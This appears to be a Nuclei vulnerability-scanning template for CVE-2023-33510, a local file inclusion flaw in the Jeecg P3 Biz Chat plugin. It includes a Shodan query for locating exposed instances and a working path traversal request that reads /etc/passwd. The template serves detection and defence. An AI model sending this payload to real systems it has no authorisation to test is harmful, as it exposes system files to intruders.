nuclei-templates/http/cves/2023/CVE-2023-33510.yaml

45 lines
1.3 KiB
YAML
Raw Normal View History

2023-06-19 09:56:15 +00:00
id: CVE-2023-33510
info:
name: Jeecg P3 Biz Chat - Local File Inclusion
author: DhiyaneshDK
severity: high
description: |
Jeecg P3 Biz Chat 1.0.5 allows remote attackers to read arbitrary files through specific parameters.
reference:
- https://twitter.com/momika233/status/1670701256535572481
- https://carl1l.github.io/2023/05/08/jeecg-p3-biz-chat-1-0-5-jar-has-arbitrary-file-read-vulnerability/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33510
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-33510
cwe-id: CWE-668
2023-08-31 11:46:18 +00:00
epss-score: 0.00347
2023-07-11 19:49:27 +00:00
cpe: cpe:2.3:a:jeecg_p3_biz_chat_project:jeecg_p3_biz_chat:1.0.5:*:*:*:*:wordpress:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.68111
2023-06-19 09:56:15 +00:00
metadata:
max-request: 1
verified: "true"
shodan-query: http.favicon.hash:1380908726
2023-07-11 19:49:27 +00:00
framework: wordpress
vendor: jeecg_p3_biz_chat_project
product: jeecg_p3_biz_chat
2023-06-22 06:52:07 +00:00
tags: cve,cve2023,jeecg,lfi
2023-06-19 09:56:15 +00:00
http:
- method: GET
path:
- "{{BaseURL}}/chat/imController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200